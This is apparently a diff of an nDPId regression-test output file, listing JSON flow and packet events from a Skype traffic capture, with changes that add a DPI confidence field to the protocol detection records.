+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4jIYAAEAR1MHAqAEiQAQXnzLdnEkAJMXJm9oCsTdSNq2fp4IomM1W0LtS\/XasnVb1cYIFcA=="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA496cAAEAROH3AqAEinTfrjjLdnFkAJNtLm9wCCq\/Vr9SUD4fwmmEiNdezuQ9niYUSk+YjJQ=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3fJEAAEARs5PAqAEinTfrjzLdnF4AIz7Dm94CUldClJ3Jj\/ar7UJqBheNPI8TcYWyskFm"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3tIAAEARCNHAqAEinTg0FTLdnEQAHrtxm+ACoNYW9c0Iu96VtPV4yMd9SlxQuA=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+WsgAAEARoKjAqAEib91NlzLdnFsAKnZMm+IChMIMA7Iu2mZsqQZJnqfJooyOMKE\/uWGoix8bU\/YAAA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HyoAAEARyHDAqAEinTg0ETLdnE0AK6EGm+QCNgMH2ITpxVJW+XmKXJHtTvzd6uYJCxFPw1m4ZheLNng="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2iHEAAEAR2M3AqAEiQAQXqjLdnEsAIkoGm+YCpGAFhs2RBCMUexQexYbsFkqmQ\/8Qtyc="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2+lgAAEARAQ\/AqAEib91NqDLdnEcAIop9m+gChrJ8v\/omTh7Ne4Bar5T53RvLKUpGcwE="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5wkwAAEARPJTAqAEib91KLDLdnF8AJV5Dm+oCagLaZIeW7H9EIxc7czPbdaN+lYkEZAqCu0Q="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAABBe8QAAEARtE3AqAEinTfrmDLdnEEALXlam+wCJAhMYE3a2mA+K8Gsvq1dkqSohtdF5WONseMrsTgQWNCbqg=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PtsAAEAR8UnAqAEinTfrkjLdgQkAINq8m+4CkuZLUb2HgW9IroWQ+JaU9ew2O1bn"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
